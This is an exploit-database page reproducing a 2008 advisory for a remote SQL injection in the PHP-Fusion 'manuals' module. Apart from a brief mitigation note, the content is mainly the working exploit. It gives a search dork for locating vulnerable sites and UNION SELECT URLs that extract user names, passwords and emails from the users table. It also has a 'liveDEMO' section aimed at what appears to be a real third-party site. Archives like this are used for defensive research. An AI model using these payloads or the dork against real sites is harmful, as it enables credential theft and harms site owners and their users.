header-logo
Suggest Exploit
vendor:
PHP-Fusion Mod manuals (manual)
by:
boom3rang
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP-Fusion Mod manuals (manual)
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHP-Fusion Mod manuals (manual) Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information such as usernames, passwords, and emails stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

########################################################
PHP-Fusion Mod manuals (manual) Remote SQL Injection Vulnerability
########################################################

++++++++++++++++++++++++++++
Author :         boom3rang
webpage :    www.khg-crew.ws
greetz :    H!tm@N, KHG, chs, redc00de, pr0xy-ki11er - [-=Kosova Hackers Group=-]
++++++++++++++++++++++++++++


[+] Dork:      infusions/manuals/manuals.php?manual=

[+] Example:         http://localhost/infusions/manuals/manuals.php?manual=[ exploit ]

[+] Exploit
--------------------------------
username:
http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_name,2+from+fusion_users--&page=1

password: 
http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_password,2+from+fusion_users--&page=1

email:
http://www.xxxxxxx.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_email,2+from+fusion_users--&page=1
--------------------------------


[+] liveDEMO: 

http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_name,2+from+fusion_users--&page=1
http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_password,2+from+fusion_users--&page=1
http://www.shuric.com/infusions/manuals/manuals.php?manual=-9999+union+all+select+user_email,2+from+fusion_users--&page=1
============================
+Proud 2 be Albanian
+Proud 2 be Muslim
+United States of Albania
============================

# milw0rm.com [2008-10-05]

Navigation

Suggest Exploit

Services By CQR